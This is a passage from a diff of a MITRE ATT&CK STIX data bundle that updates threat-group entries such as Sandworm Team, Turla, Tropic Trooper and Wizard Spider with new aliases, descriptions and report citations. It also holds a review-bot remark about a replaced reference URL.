+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) is an alleged Chinese-speaking adversary whose primary objective appeared to be cryptojacking, or stealing victim system resources for the purposes of mining cryptocurrency. The name [Rocke](https://attack.mitre.org/groups/G0106) comes from the email address \"rocke@live.cn\" used to create the wallet which held collected cryptocurrency. Researchers have detected overlaps between [Rocke](https://attack.mitre.org/groups/G0106) and the Iron Cybercrime Group, though this attribution has not been confirmed.(Citation: Talos Rocke August 2018)",
+ "name": "Rocke",
+ "type": "intrusion-set",
+ "id": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "aliases": [
+ "Rocke"
+ ],
+ "modified": "2020-06-19T20:41:21.215Z",
+ "created": "2020-05-26T14:20:20.623Z",
+ "x_mitre_version": "1.0"
+ },
+ {
+ "created": "2017-05-31T21:32:04.588Z",
+ "modified": "2020-07-04T01:56:59.493Z",
+ "aliases": [
+ "Sandworm Team",
+ "ELECTRUM",
+ "Telebots",
+ "IRON VIKING",
+ "BlackEnergy (Group)",
+ "Quedagh",
+ "VOODOO BEAR"
+ ],
"type": "intrusion-set",
"id": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Sandworm Team",
- "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) is a Russian cyber espionage group that has operated since approximately 2009. The group likely consists of Russian pro-hacktivists. [Sandworm Team](https://attack.mitre.org/groups/G0034) targets mainly Ukrainian entities associated with energy, industrial control systems, SCADA, government, and media. [Sandworm Team](https://attack.mitre.org/groups/G0034) has been linked to the Ukrainian energy sector attack in late 2015.\n (Citation: iSIGHT Sandworm 2014) (Citation: CrowdStrike VOODOO BEAR)",
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) is a destructive Russian threat group that has been attributed to Russian GRU Unit 74455 by the U.S. Department of Justice and U.K. National Cyber Security Centre. [Sandworm Team](https://attack.mitre.org/groups/G0034)'s most notable attacks include the 2015 and 2016 targeting of Ukrainian electrical companies and 2017's [NotPetya](https://attack.mitre.org/software/S0368) attacks. [Sandworm Team](https://attack.mitre.org/groups/G0034) has been active since at least 2009.(Citation: iSIGHT Sandworm 2014)(Citation: CrowdStrike VOODOO BEAR)(Citation: USDOJ Sandworm Feb 2020)(Citation: NCSC Sandworm Feb 2020)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -189104,6 +217268,22 @@
"source_name": "Sandworm Team",
"description": "(Citation: iSIGHT Sandworm 2014) (Citation: F-Secure BlackEnergy 2014) (Citation: InfoSecurity Sandworm Oct 2014)"
},
+ {
+ "source_name": "ELECTRUM",
+ "description": "(Citation: Dragos ELECTRUM)"
+ },
+ {
+ "source_name": "Telebots",
+ "description": "(Citation: NCSC Sandworm Feb 2020)"
+ },
+ {
+ "source_name": "IRON VIKING",
+ "description": "(Citation: Secureworks IRON VIKING )"
+ },
+ {
+ "source_name": "BlackEnergy (Group)",
+ "description": "(Citation: NCSC Sandworm Feb 2020)"
+ },
{
"source_name": "Quedagh",
"description": "Based on similarities between TTPs, malware, and targeting, Sandworm Team and Quedagh appear to refer to the same group. (Citation: iSIGHT Sandworm 2014) (Citation: F-Secure BlackEnergy 2014)"
@@ -189123,7 +217303,17 @@
"source_name": "CrowdStrike VOODOO BEAR"
},
{
- "url": "https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf",
+ "source_name": "USDOJ Sandworm Feb 2020",
+ "url": "https://www.state.gov/the-united-states-condemns-russian-cyber-attack-against-the-country-of-georgia/",
+ "description": "Pompeo, M. (2020, February 20). The United States Condemns Russian Cyber Attack Against the Country of Georgia. Retrieved June 18, 2020."
+ },
+ {
+ "source_name": "NCSC Sandworm Feb 2020",
+ "url": "https://www.ncsc.gov.uk/news/ncsc-supports-sandworm-advisory",
+ "description": "NCSC. (2020, February 20). NCSC supports US advisory regarding GRU intrusion set Sandworm. Retrieved June 10, 2020."
+ },
+ {
+ "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf",
"description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.",
"source_name": "F-Secure BlackEnergy 2014"
},
@@ -189131,15 +217321,18 @@
"url": "https://www.infosecurity-magazine.com/news/microsoft-zero-day-traced-russian/",
"description": "Muncaster, P.. (2014, October 14). Microsoft Zero Day Traced to Russian \u2018Sandworm\u2019 Hackers. Retrieved October 6, 2017.",
"source_name": "InfoSecurity Sandworm Oct 2014"
+ },
+ {
+ "source_name": "Dragos ELECTRUM",
+ "url": "https://www.dragos.com/resource/electrum/",
+ "description": "Dragos. (2017, January 1). ELECTRUM Threat Profile. Retrieved June 10, 2020."
+ },
+ {
+ "source_name": "Secureworks IRON VIKING ",
+ "url": "https://www.secureworks.com/research/threat-profiles/iron-viking",
+ "description": "Secureworks. (2020, May 1). IRON VIKING Threat Profile. Retrieved June 10, 2020."
}
],
- "aliases": [
- "Sandworm Team",
- "Quedagh",
- "VOODOO BEAR"
- ],
- "modified": "2019-03-25T16:55:26.051Z",
- "created": "2017-05-31T21:32:04.588Z",
"x_mitre_version": "1.0"
},
{
@@ -189174,6 +217367,34 @@
"created": "2017-05-31T21:32:00.677Z",
"x_mitre_version": "1.2"
},
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "external_id": "G0104",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/groups/G0104"
+ },
+ {
+ "source_name": "McAfee Sharpshooter December 2018",
+ "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
+ "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020."
+ }
+ ],
+ "name": "Sharpshooter",
+ "description": "Operation [Sharpshooter](https://attack.mitre.org/groups/G0104) is the name of a cyber espionage campaign discovered in October 2018 targeting nuclear, defense, energy, and financial companies. Though overlaps between this adversary and [Lazarus Group](https://attack.mitre.org/groups/G0032) have been noted, definitive links have not been established.(Citation: McAfee Sharpshooter December 2018)",
+ "type": "intrusion-set",
+ "id": "intrusion-set--5e78ae92-3ffd-4b16-bf62-e798529d73f1",
+ "aliases": [
+ "Sharpshooter"
+ ],
+ "modified": "2020-06-30T03:08:44.808Z",
+ "created": "2020-05-14T21:40:31.089Z",
+ "x_mitre_version": "1.0"
+ },
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -189200,19 +217421,19 @@
"source_name": "SecureList Silence Nov 2017"
}
],
- "description": "[Silence](https://attack.mitre.org/groups/G0091) is a financially motivated threat actor targeting financial institutions in different countries. The group was first seen in June 2016. Their main targets reside in Russia, Ukraine, Belarus, Azerbaijan, Poland and Kazakhstan. They compromised various banking systems, including the Russian Central Bank's Automated Workstation Client, ATMs, and card processing. (Citation: Cyber Forensicator Silence Jan 2019)(Citation: SecureList Silence Nov 2017) ",
+ "description": "[Silence](https://attack.mitre.org/groups/G0091) is a financially motivated threat actor targeting financial institutions in different countries. The group was first seen in June 2016. Their main targets reside in Russia, Ukraine, Belarus, Azerbaijan, Poland and Kazakhstan. They compromised various banking systems, including the Russian Central Bank's Automated Workstation Client, ATMs, and card processing.(Citation: Cyber Forensicator Silence Jan 2019)(Citation: SecureList Silence Nov 2017) ",
"name": "Silence",
"type": "intrusion-set",
"id": "intrusion-set--d13c8a7f-740b-4efa-a232-de7d6bb05321",
"aliases": [
"Silence"
],
- "modified": "2020-03-30T19:17:42.266Z",
+ "modified": "2020-06-23T20:30:06.863Z",
"created": "2019-05-24T17:57:36.491Z",
+ "x_mitre_version": "1.1",
"x_mitre_contributors": [
"Oleg Skulkin, Group-IB"
- ],
- "x_mitre_version": "1.1"
+ ]
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -189230,9 +217451,9 @@
"description": "(Citation: Unit42 SilverTerrier 2018)(Citation: Unit42 SilverTerrier 2016)"
},
{
- "source_name": "Unit42 SilverTerrier 2018",
+ "description": "Unit42. (2016). SILVERTERRIER: THE RISE OF NIGERIAN BUSINESS EMAIL COMPROMISE. Retrieved November 13, 2018.",
"url": "https://www.paloaltonetworks.com/apps/pan/public/downloadResource?pagePath=/content/pan/en_US/resources/whitepapers/unit42-silverterrier-rise-of-nigerian-business-email-compromise",
- "description": "Unit42. (2016). SILVERTERRIER: THE RISE OF NIGERIAN BUSINESS EMAIL COMPROMISE. Retrieved November 13, 2018."
+ "source_name": "Unit42 SilverTerrier 2018"
},
{
"description": "Renals, P., Conant, S. (2016). SILVERTERRIER: The Next Evolution in Nigerian Cybercrime. Retrieved November 13, 2018.",
@@ -189247,11 +217468,16 @@
"aliases": [
"SilverTerrier"
],
- "modified": "2020-03-30T19:18:51.266Z",
+ "modified": "2020-05-19T23:26:11.780Z",
"created": "2019-01-29T21:36:59.793Z",
"x_mitre_version": "1.1"
},
{
+ "created": "2019-07-18T20:47:50.050Z",
+ "modified": "2020-03-30T02:45:28.994Z",
+ "aliases": [
+ "Soft Cell"
+ ],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
@@ -189276,15 +217502,10 @@
"description": "Operation [Soft Cell](https://attack.mitre.org/groups/G0093) is a group that is reportedly affiliated with China and is likely state-sponsored. The group has operated since at least 2012 and has compromised high-profile telecommunications networks.(Citation: Cybereason Soft Cell June 2019)",
"type": "intrusion-set",
"id": "intrusion-set--06a11b7e-2a36-47fe-8d3e-82c265df3258",
- "aliases": [
- "Soft Cell"
- ],
- "modified": "2020-03-30T02:45:28.994Z",
- "created": "2019-07-18T20:47:50.050Z",
+ "x_mitre_version": "1.1",
"x_mitre_contributors": [
"Cybereason Nocturnus, @nocturnus"
- ],
- "x_mitre_version": "1.1"
+ ]
},
{
"type": "intrusion-set",
@@ -189316,10 +217537,10 @@
],
"modified": "2020-03-30T02:46:16.483Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_version": "1.1",
"x_mitre_contributors": [
"Alan Neville, @abnev"
- ]
+ ],
+ "x_mitre_version": "1.1"
},
{
"type": "intrusion-set",
@@ -189409,14 +217630,14 @@
"description": "ProjectSauron is used to refer both to the threat group also known as G0041 as well as the malware platform also known as S0125. (Citation: Kaspersky ProjectSauron Blog) (Citation: Kaspersky ProjectSauron Full Report)"
},
{
- "url": "http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets",
+ "source_name": "Symantec Strider Blog",
"description": "Symantec Security Response. (2016, August 7). Strider: Cyberespionage group turns eye of Sauron on targets. Retrieved August 17, 2016.",
- "source_name": "Symantec Strider Blog"
+ "url": "http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets"
},
{
- "url": "https://securelist.com/faq-the-projectsauron-apt/75533/",
+ "source_name": "Kaspersky ProjectSauron Blog",
"description": "Kaspersky Lab's Global Research & Analysis Team. (2016, August 8). ProjectSauron: top level cyber-espionage platform covertly extracts encrypted government comms. Retrieved August 17, 2016.",
- "source_name": "Kaspersky ProjectSauron Blog"
+ "url": "https://securelist.com/faq-the-projectsauron-apt/75533/"
},
{
"source_name": "Kaspersky ProjectSauron Full Report",
@@ -189428,7 +217649,7 @@
"Strider",
"ProjectSauron"
],
- "modified": "2020-03-25T20:54:31.986Z",
+ "modified": "2020-06-29T01:43:19.374Z",
"created": "2017-05-31T21:32:07.541Z",
"x_mitre_version": "1.1"
},
@@ -189499,10 +217720,10 @@
],
"modified": "2020-03-30T19:22:32.962Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
"x_mitre_contributors": [
"Valerii Marchuk, Cybersecurity Help s.r.o."
- ]
+ ],
+ "x_mitre_version": "1.1"
},
{
"id": "intrusion-set--7eda3dd8-b09b-4705-8090-c2ad9fb8c14d",
@@ -189515,6 +217736,10 @@
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/groups/G0092"
},
+ {
+ "source_name": "Hive0065",
+ "description": "(Citation: IBM TA505 April 2020)"
+ },
{
"description": "Proofpoint Staff. (2017, September 27). Threat Actor Profile: TA505, From Dridex to GlobeImposter. Retrieved May 28, 2019.",
"url": "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta505-dridex-globeimposter",
@@ -189529,6 +217754,11 @@
"source_name": "Proofpoint TA505 Jan 2019",
"url": "https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505",
"description": "Schwarz, D. and Proofpoint Staff. (2019, January 9). ServHelper and FlawedGrace - New malware introduced by TA505. Retrieved May 28, 2019."
+ },
+ {
+ "source_name": "IBM TA505 April 2020",
+ "url": "https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/",
+ "description": "Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020."
}
],
"object_marking_refs": [
@@ -189536,9 +217766,10 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"aliases": [
- "TA505"
+ "TA505",
+ "Hive0065"
],
- "modified": "2020-03-30T19:23:32.608Z",
+ "modified": "2020-06-23T20:39:02.606Z",
"created": "2019-05-28T15:54:17.213Z",
"x_mitre_version": "1.1"
},
@@ -189702,6 +217933,17 @@
"x_mitre_version": "1.1"
},
{
+ "created": "2017-05-31T21:31:58.518Z",
+ "modified": "2020-03-30T02:47:04.337Z",
+ "aliases": [
+ "Threat Group-3390",
+ "TG-3390",
+ "Emissary Panda",
+ "BRONZE UNION",
+ "APT27",
+ "Iron Tiger",
+ "LuckyMouse"
+ ],
"type": "intrusion-set",
"id": "intrusion-set--fb366179-766c-4a4a-afa1-52bff1fd601c",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -189780,17 +218022,6 @@
"source_name": "Unit42 Emissary Panda May 2019"
}
],
- "aliases": [
- "Threat Group-3390",
- "TG-3390",
- "Emissary Panda",
- "BRONZE UNION",
- "APT27",
- "Iron Tiger",
- "LuckyMouse"
- ],
- "modified": "2020-03-30T02:47:04.337Z",
- "created": "2017-05-31T21:31:58.518Z",
"x_mitre_version": "1.3"
},
{
@@ -189826,10 +218057,10 @@
"x_mitre_version": "1.1"
},
{
- "id": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
- "type": "intrusion-set",
- "name": "Tropic Trooper",
- "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) is an unaffiliated threat group that has led targeted campaigns against targets in Taiwan, the Philippines, and Hong Kong. [Tropic Trooper](https://attack.mitre.org/groups/G0081) focuses on targeting government, healthcare, transportation, and high-tech industries and has been active since 2011.(Citation: TrendMicro Tropic Trooper Mar 2018)(Citation: Unit 42 Tropic Trooper Nov 2016)",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"external_id": "G0081",
@@ -189840,30 +218071,45 @@
"source_name": "Tropic Trooper",
"description": "(Citation: TrendMicro Tropic Trooper Mar 2018)(Citation: Unit 42 Tropic Trooper Nov 2016)"
},
+ {
+ "source_name": "Pirate Panda",
+ "description": "(Citation: Crowdstrike Pirate Panda April 2020)"
+ },
{
"source_name": "KeyBoy",
"description": "(Citation: Unit 42 Tropic Trooper Nov 2016)(Citation: TrendMicro Tropic Trooper Mar 2018)"
},
{
- "source_name": "TrendMicro Tropic Trooper Mar 2018",
+ "description": "Horejsi, J., et al. (2018, March 14). Tropic Trooper\u2019s New Strategy. Retrieved November 9, 2018.",
"url": "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/",
- "description": "Horejsi, J., et al. (2018, March 14). Tropic Trooper\u2019s New Strategy. Retrieved November 9, 2018."
+ "source_name": "TrendMicro Tropic Trooper Mar 2018"
},
{
- "source_name": "Unit 42 Tropic Trooper Nov 2016",
+ "description": "Ray, V. (2016, November 22). Tropic Trooper Targets Taiwanese Government and Fossil Fuel Provider With Poison Ivy. Retrieved November 9, 2018.",
"url": "https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/",
- "description": "Ray, V. (2016, November 22). Tropic Trooper Targets Taiwanese Government and Fossil Fuel Provider With Poison Ivy. Retrieved November 9, 2018."
+ "source_name": "Unit 42 Tropic Trooper Nov 2016"
+ },
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ },
+ {
+ "source_name": "Crowdstrike Pirate Panda April 2020",
+ "url": "https://www.crowdstrike.com/blog/on-demand-webcast-crowdstrike-experts-on-covid-19-cybersecurity-challenges-and-recommendations/",
+ "description": "Busselen, M. (2020, April 7). On-demand Webcast: CrowdStrike Experts on COVID-19 Cybersecurity Challenges and Recommendations. Retrieved May 20, 2020."
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) is an unaffiliated threat group that has led targeted campaigns against targets in Taiwan, the Philippines, and Hong Kong. [Tropic Trooper](https://attack.mitre.org/groups/G0081) focuses on targeting government, healthcare, transportation, and high-tech industries and has been active since 2011.(Citation: TrendMicro Tropic Trooper Mar 2018)(Citation: Unit 42 Tropic Trooper Nov 2016)(Citation: TrendMicro Tropic Trooper May 2020)",
+ "name": "Tropic Trooper",
+ "type": "intrusion-set",
+ "id": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
"aliases": [
"Tropic Trooper",
+ "Pirate Panda",
"KeyBoy"
],
- "modified": "2020-03-30T19:28:54.370Z",
+ "modified": "2020-05-29T03:23:27.843Z",
"created": "2019-01-29T20:17:48.717Z",
"x_mitre_contributors": [
"Edward Millington",
@@ -189911,14 +218157,14 @@
"description": "(Citation: CrowdStrike VENOMOUS BEAR)"
},
{
- "source_name": "Kaspersky Turla",
+ "url": "https://securelist.com/the-epic-turla-operation/65545/",
"description": "Kaspersky Lab's Global Research and Analysis Team. (2014, August 7). The Epic Turla Operation: Solving some of the mysteries of Snake/Uroburos. Retrieved December 11, 2014.",
- "url": "https://securelist.com/the-epic-turla-operation/65545/"
+ "source_name": "Kaspersky Turla"
},
{
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf",
+ "source_name": "ESET Gazer Aug 2017",
"description": "ESET. (2017, August). Gazing at Gazer: Turla\u2019s new second stage backdoor. Retrieved September 14, 2017.",
- "source_name": "ESET Gazer Aug 2017"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf"
},
{
"url": "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-march-venomous-bear/",
@@ -189933,12 +218179,12 @@
{
"source_name": "Symantec Waterbug",
"description": "Symantec. (2015, January 26). The Waterbug attack group. Retrieved April 10, 2015.",
- "url": "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf"
+ "url": "https://www.threatminer.org/report.php?q=waterbug-attack-group.pdf&y=2015#gsc.tab=0&gsc.q=waterbug-attack-group.pdf&gsc.page=1"
},
{
- "url": "https://securelist.com/introducing-whitebear/81638/",
+ "source_name": "Securelist WhiteBear Aug 2017",
"description": "Kaspersky Lab's Global Research & Analysis Team. (2017, August 30). Introducing WhiteBear. Retrieved September 21, 2017.",
- "source_name": "Securelist WhiteBear Aug 2017"
+ "url": "https://securelist.com/introducing-whitebear/81638/"
},
{
"source_name": "ESET Turla PowerShell May 2019",
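Review bot: The replaced `url` for the "Symantec Waterbug" reference now points at a third-party mirror (threatminer.org) with a search query string attached, so the citation no longer resolves to the publisher's own document and the query parameters carry no citation value. If this file simply tracks the upstream ATT&CK bundle the change is inherited, but for provenance of threat-intel references the original publisher URL, or an archived copy of it, is the better `url` value.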
@@ -189954,12 +218200,13 @@
"Snake",
"Krypton"
],
- "modified": "2020-03-30T03:08:05.557Z",
+ "modified": "2020-07-06T14:49:46.052Z",
"created": "2017-05-31T21:31:49.816Z",
- "x_mitre_version": "1.3",
"x_mitre_contributors": [
+ "Matthieu Faou, ESET",
"Edward Millington"
- ]
+ ],
+ "x_mitre_version": "1.3"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -189991,20 +218238,89 @@
],
"modified": "2020-03-30T19:31:01.756Z",
"created": "2019-05-24T17:02:44.226Z",
+ "x_mitre_version": "1.1",
"x_mitre_contributors": [
"Lab52 by S2 Grupo"
- ],
- "x_mitre_version": "1.1"
+ ]
},
{
- "type": "intrusion-set",
- "id": "intrusion-set--c5947e1c-1cbc-434c-94b8-27c7e3be0fff",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Winnti Group",
- "description": "[Winnti Group](https://attack.mitre.org/groups/G0044) is a threat group with Chinese origins that has been active since at least 2010. The group has heavily targeted the gaming industry, but it has also expanded the scope of its targeting. (Citation: Kaspersky Winnti April 2013) (Citation: Kaspersky Winnti June 2015) (Citation: Novetta Winnti April 2015) Some reporting suggests a number of other groups, including [Axiom](https://attack.mitre.org/groups/G0001), [APT17](https://attack.mitre.org/groups/G0025), and [Ke3chang](https://attack.mitre.org/groups/G0004), are closely linked to [Winnti Group](https://attack.mitre.org/groups/G0044). (Citation: 401 TRG Winnti Umbrella May 2018)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
+ "external_references": [
+ {
+ "external_id": "G0107",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/groups/G0107"
+ },
+ {
+ "source_name": "Symantec Whitefly March 2019",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/whitefly-espionage-singapore",
+ "description": "Symantec. (2019, March 6). Whitefly: Espionage Group has Singapore in Its Sights. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Whitefly](https://attack.mitre.org/groups/G0107) is a cyber espionage group that has been operating since at least 2017. The group has targeted organizations based mostly in Singapore across a wide variety of sectors, and is primarily interested in stealing large amounts of sensitive information. The group has been linked to an attack against Singapore\u2019s largest public health organization, SingHealth.(Citation: Symantec Whitefly March 2019)",
+ "name": "Whitefly",
+ "type": "intrusion-set",
+ "id": "intrusion-set--b74f909f-8e52-4b69-b770-162bf59a1b4e",
+ "aliases": [
+ "Whitefly"
+ ],
+ "modified": "2020-05-27T21:56:24.890Z",
+ "created": "2020-05-26T16:55:09.674Z",
+ "x_mitre_version": "1.0"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "external_id": "G0112",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/groups/G0112"
+ },
+ {
+ "source_name": "Bahamut",
+ "description": "(Citation: SANS Windshift August 2018)"
+ },
+ {
+ "source_name": "SANS Windshift August 2018",
+ "url": "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf",
+ "description": "Karim, T. (2018, August). TRAILS OF WINDSHIFT. Retrieved June 25, 2020."
+ },
+ {
+ "source_name": "objective-see windtail1 dec 2018",
+ "url": "https://objective-see.com/blog/blog_0x3B.html",
+ "description": "Wardle, Patrick. (2018, December 20). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 1). Retrieved October 3, 2019."
+ },
+ {
+ "source_name": "objective-see windtail2 jan 2019",
+ "url": "https://objective-see.com/blog/blog_0x3D.html",
+ "description": "Wardle, Patrick. (2019, January 15). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 2). Retrieved October 3, 2019."
+ }
+ ],
+ "description": "[Windshift](https://attack.mitre.org/groups/G0112) is a threat group that has been active since at least 2017, targeting specific individuals for surveillance in government departments and critical infrastructure across the Middle East.(Citation: SANS Windshift August 2018)(Citation: objective-see windtail1 dec 2018)(Citation: objective-see windtail2 jan 2019)",
+ "name": "Windshift",
+ "type": "intrusion-set",
+ "id": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1",
+ "aliases": [
+ "Windshift",
+ "Bahamut"
+ ],
+ "modified": "2020-06-26T13:46:14.122Z",
+ "created": "2020-06-25T17:16:39.168Z",
+ "x_mitre_version": "1.0"
+ },
+ {
+ "created": "2017-05-31T21:32:08.682Z",
+ "modified": "2020-05-04T22:15:08.418Z",
+ "aliases": [
+ "Winnti Group",
+ "Blackfly"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -190040,22 +218356,75 @@
"source_name": "401 TRG Winnti Umbrella May 2018"
},
{
- "source_name": "Symantec Suckfly March 2016",
+ "url": "http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates",
"description": "DiMaggio, J.. (2016, March 15). Suckfly: Revealing the secret life of your code signing certificates. Retrieved August 3, 2016.",
- "url": "http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates"
+ "source_name": "Symantec Suckfly March 2016"
}
],
- "aliases": [
- "Winnti Group",
- "Blackfly"
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "modified": "2019-03-25T17:15:03.267Z",
- "created": "2017-05-31T21:32:08.682Z",
+ "description": "[Winnti Group](https://attack.mitre.org/groups/G0044) is a threat group with Chinese origins that has been active since at least 2010. The group has heavily targeted the gaming industry, but it has also expanded the scope of its targeting. (Citation: Kaspersky Winnti April 2013) (Citation: Kaspersky Winnti June 2015) (Citation: Novetta Winnti April 2015) Some reporting suggests a number of other groups, including [Axiom](https://attack.mitre.org/groups/G0001), [APT17](https://attack.mitre.org/groups/G0025), and [Ke3chang](https://attack.mitre.org/groups/G0004), are closely linked to [Winnti Group](https://attack.mitre.org/groups/G0044). (Citation: 401 TRG Winnti Umbrella May 2018)",
+ "name": "Winnti Group",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "id": "intrusion-set--c5947e1c-1cbc-434c-94b8-27c7e3be0fff",
+ "type": "intrusion-set",
"x_mitre_version": "1.0",
"x_mitre_contributors": [
"Edward Millington"
]
},
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "external_id": "G0102",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/groups/G0102"
+ },
+ {
+ "source_name": "TEMP.MixMaster",
+ "description": "(Citation: FireEye Ryuk and Trickbot January 2019)"
+ },
+ {
+ "source_name": "Grim Spider",
+ "description": "(Citation: CrowdStrike Ryuk January 2019)(Citation: CrowdStrike Grim Spider May 2019)"
+ },
+ {
+ "source_name": "CrowdStrike Ryuk January 2019",
+ "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/",
+ "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020."
+ },
+ {
+ "source_name": "FireEye Ryuk and Trickbot January 2019",
+ "url": "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html",
+ "description": "Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020."
+ },
+ {
+ "source_name": "CrowdStrike Grim Spider May 2019",
+ "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/",
+ "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) is financially motivated group that has been conducting ransomware campaigns since at least August 2018, primarily targeting large organizations. (Citation: CrowdStrike Ryuk January 2019)",
+ "name": "Wizard Spider",
+ "type": "intrusion-set",
+ "id": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "aliases": [
+ "Wizard Spider",
+ "TEMP.MixMaster",
+ "Grim Spider"
+ ],
+ "modified": "2020-06-16T17:30:19.543Z",
+ "created": "2020-05-12T18:15:29.396Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_contributors": [
+ "Oleksiy Gayda"
+ ]
+ },
{
"type": "intrusion-set",
"id": "intrusion-set--16ade1aa-0ea1-4bb7-88cc-9079df2ae756",
@@ -190086,10 +218455,10 @@
],
"modified": "2020-03-18T19:54:59.120Z",
"created": "2017-05-31T21:31:53.579Z",
- "x_mitre_version": "1.2",
"x_mitre_contributors": [
"Tatsuya Daitoku, Cyber Defense Institute, Inc."
